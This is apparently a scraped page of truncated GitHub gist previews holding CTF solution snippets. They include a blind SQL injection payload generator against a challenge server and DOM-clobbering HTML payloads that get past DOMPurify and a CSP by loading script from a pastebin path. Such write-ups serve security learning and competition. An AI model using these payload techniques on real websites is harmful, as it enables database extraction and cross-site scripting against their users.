This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305 | |
# Which I got from p4 team. | |
import random | |
from math import factorial | |
SET_SIZE = 8 | |
MAX_VAL = 40000 | |
# get random 8 integers |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import Flask | |
import time | |
import requests | |
import os | |
import re | |
import sys | |
app = Flask(__name__) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* This is a solution to "Car repair shop" challenge from hack.lu ctf 2019 | |
* Solves: 9 | |
* 10/23/2019 © by terjanq | |
*/ | |
/* The idea of the solution is: */ | |
function WoW(){ this.Oo = 'O.o'; } | |
var x = new WoW(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const fetch = require('node-fetch'); | |
var flag = 'nn9ed{' | |
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}' | |
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}'); | |
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect | |
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/' | |
// Generates definitions for fonts | |
function generateFonts() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- 225 char solution (remove new lines) --> | |
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
<form id=CONFIG> | |
<img id=testPath name=test> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) --> | |
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
<form id=CONFIG> | |
<img id=test> | |
<a> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Solution 212! (remove new lines) --> | |
<a id=CONFIG name=test> | |
<p> | |
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
<p> | |
T |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<a href="https://pastebin.com" id="testPath"></a> | |
<a id="CONFIG" name=test></a> | |
<a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
window.CONFIG = window.CONFIG || { | |
version: "v20190816", | |
test: false, | |
appName: "XSS Challenge", | |
} | |
function loadModule(moduleName) { | |
const scriptSrc = new URL(document.currentScript.src); | |
let url = ''; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const sanitized = DOMPurify.sanitize(input.value); | |
const html = ` | |
<meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/"> | |
<h1>Homepage!</h1> | |
<p>Welcome to my homepage! Here are some info about me:</p> | |
${sanitized} | |
<script nonce=xyz src="./main.js"><\/script> | |
`; |